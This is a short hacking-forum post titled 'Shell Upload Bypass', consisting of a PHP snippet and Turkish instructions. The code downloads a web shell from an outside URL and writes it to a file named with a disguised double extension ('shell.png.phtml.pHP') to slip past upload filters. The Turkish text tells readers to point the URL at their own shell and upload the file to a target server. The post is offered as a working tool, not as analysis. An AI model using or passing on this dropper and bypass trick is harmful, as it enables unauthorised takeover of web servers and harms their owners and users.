Shell Upload Bypass (1 Viewer)

Joined
May 5, 2019
Credits
132
Rating - 0%
Code:
<?php
$shell = fopen('shell.png.phtml.pHP', 'w');
$codes = file_get_contents("http://site.com/shell.txt");
fwrite($shell, $codes);
fclose($shell);
?>

http://site.com/shell.txt editleyip kendi shell yolunuzu txt olarak ekleyin düzenlenen php dosyasını servera upload edin. Aynı dosyanın bulunduğu url de shell.png.phtml.pHP olarak shelliniz yüklenmiş olacaktır kolay gelsin :)
 

Users who are viewing this thread

Top